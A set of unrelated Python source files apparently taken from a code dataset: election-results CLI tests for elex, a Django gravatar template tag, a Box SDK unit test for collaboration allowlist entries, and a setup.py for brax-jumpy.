def gen_data_test(command):
"""
Dynamically generate a data test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
for i, row in enumerate(cli_data):
for k, v in api_data[i].serialize().items():
self.assertEqual(row[k], v)
return test
def gen_timestamp_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
self.assertEqual(cli_fields[-1], 'timestamp')
return test
def gen_timestamp_data_test(command):
"""
Generate test to ensure timestamp data is an integer
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
for row in cli_data:
try:
self.assertTrue(unicode(row['timestamp']).isnumeric())
except NameError:
self.assertTrue(str(row['timestamp']).isnumeric())
return test
def gen_batch_name_data_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
batch_name='batch-01')
for row in cli_data:
self.assertEqual(row['batchname'], 'batch-01')
return test
for command in TEST_COMMANDS:
fields_test_name = 'test_json_{0}_fields'.format(
command.replace('-', '_')
)
dict[fields_test_name] = gen_fields_test(command)
length_test_name = 'test_json_{0}_length'.format(
command.replace('-', '_')
)
dict[length_test_name] = gen_length_test(command)
data_test_name = 'test_json_{0}_data'.format(
command.replace('-', '_')
)
dict[data_test_name] = gen_data_test(command)
timestamp_data_test_name = 'test_json_{0}_data_timestamp'.format(
command.replace('-', '_')
)
dict[timestamp_data_test_name] = gen_timestamp_test(command)
timestamp_data_test_name = 'test_json_{0}_timestamp_data'.format(
command.replace('-', '_')
)
dict[timestamp_data_test_name] = gen_timestamp_data_test(command)
batch_name_data_test_name = 'test_csv_{0}_batch_name_data'.format(
command.replace('-', '_')
)
dict[batch_name_data_test_name] = gen_batch_name_data_test(command)
return type.__new__(mcs, name, bases, dict)
class ElexCLIJSONTestCase(
with_metaclass(ElexCLIJSONTestMeta, tests.ElectionResultsTestCase)
):
"""
This testing class is mostly dynamically generated by its metaclass.
The goal of the CLI tests is to the make sure the CLI output matches the
Python API. The API tests guarantee the validity of the data, while these
tests guarantee the CLI provides the same data in JSON format.
"""
def test_json_elections_fields(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_json_elections_length(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(len(data), 11)
def test_json_elections_date(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['electiondate'], '2015-08-04')
def test_json_elections_liveresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['liveresults'], False)
def test_json_elections_testresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['testresults'], True)
def test_json_next_election_fields(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_json_next_election_length(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(len(data), 1)
def test_json_next_election_date(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['electiondate'], '2015-08-25')
def test_json_next_election_liveresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['liveresults'], True)
def test_json_next_election_testresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['testresults'], False)
def test_json_delegate_fields(self):
fields, data = self._test_command(command='delegates')
self.assertEqual(
fields,
[
'level', 'party_total', 'superdelegates_count', 'last',
'state', 'candidateid', 'party_need', 'party',
'delegates_count', 'id', 'd1', 'd7', 'd30'
]
)
def test_json_delegate_state_count(self):
fields, data = self._test_command(command='delegates')
number_of_states = list(
set([d['state'] for d in data if d['level'] == 'state'])
)
self.assertEqual(58, len(number_of_states))
def test_json_results_resultslevel(self):
fields, data = self._test_command(
command='results',
datafile=DISTRICT_DATA_FILE,
resultslevel='district'
)
self.assertEqual(data[17]['reportingunitname'], 'District 1')
def _test_command(
self,
command,
datafile=DATA_FILE,
delsum_datafile=DELSUM_DATA_FILE,
delsuper_datafile=DELSUPER_DATA_FILE,
electiondate=DATA_ELECTION_DATE,
resultslevel=None,
with_timestamp=False,
batch_name=False
):
"""
Execute an `elex` sub-command; returns fieldnames and rows
"""
stdout_backup = sys.stdout
sys.stdout = StringIO()
argv = [command]
argv.append(electiondate)
argv = argv + ['--data-file', datafile, '-o', 'json']
argv = argv + ['--delegate-sum-file', delsum_datafile]
argv = argv + ['--delegate-super-file', delsuper_datafile]
argv = argv + ['--results-level', resultslevel]
if with_timestamp:
argv = argv + ['--with-timestamp']
if batch_name:
argv = argv + ['--batch-name', batch_name]
app = ElexApp(argv=argv)
app.setup()
app.log.set_level('FATAL')
app.run()
json_data = sys.stdout.getvalue()
data = json.loads(json_data, object_pairs_hook=OrderedDict)
sys.stdout.close()
sys.stdout = stdout_backup
return list(data[0].keys()), data
|
resrc/utils/templatetags/gravatar.py | theWhiteFox/resrc | 274 | 19124 | # -*- coding: utf-8 -*-:
from django import template
import urllib
import hashlib
register = template.Library()
def gravatar(email, size=80, username=None):
gravatar_url = "http://www.gravatar.com/avatar.php?"
gravatar_url += urllib.urlencode({
'gravatar_id': hashlib.md5(email).hexdigest(),
'size': str(size)
})
if username is not None:
return """<img src="%s" alt="gravatar for %s" />""" % (gravatar_url, username)
else:
return """<img src="%s" alt="gravatar" />""" % (gravatar_url)
register.simple_tag(gravatar)
|
test/unit/object/test_collaboration_allowlist_entry.py | box/box-python-sdk | 367 | 19142 | <gh_stars>100-1000
# coding: utf-8
from __future__ import unicode_literals, absolute_import
from boxsdk.config import API
def test_get(mock_box_session, test_collaboration_allowlist_entry):
entry_id = test_collaboration_allowlist_entry.object_id
expected_url = '{0}/collaboration_whitelist_entries/{1}'.format(API.BASE_API_URL, entry_id)
mock_entry = {
'type': 'collaboration_whitelist_entry',
'id': '98765',
'domain': 'example.com',
'direction': 'inbound'
}
mock_box_session.get.return_value.json.return_value = mock_entry
entry = test_collaboration_allowlist_entry.get()
mock_box_session.get.assert_called_once_with(expected_url, headers=None, params=None)
assert entry.id == mock_entry['id']
assert entry.domain == mock_entry['domain']
assert entry.direction == mock_entry['direction']
def test_delete(mock_box_session, test_collaboration_allowlist_entry):
entry_id = test_collaboration_allowlist_entry.object_id
expected_url = '{0}/collaboration_whitelist_entries/{1}'.format(API.BASE_API_URL, entry_id)
test_collaboration_allowlist_entry.delete()
mock_box_session.delete.assert_called_once_with(expected_url, expect_json_response=False, headers=None, params={})
|
jumpy/setup.py | bharadwaj1098/brax | 1,162 | 19143 | <filename>jumpy/setup.py
# Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""setup.py for Jumpy.
Install for development:
pip intall -e .
"""
from setuptools import setup
setup(
name="brax-jumpy",
version="0.0.1",
description=("Common backend for JAX or numpy."),
author="Brax Authors",
author_email="<EMAIL>",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="http://github.com/google/brax",
license="Apache 2.0",
py_modules=["jumpy"],
install_requires=[
"jax",
"jaxlib",
"numpy",
],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.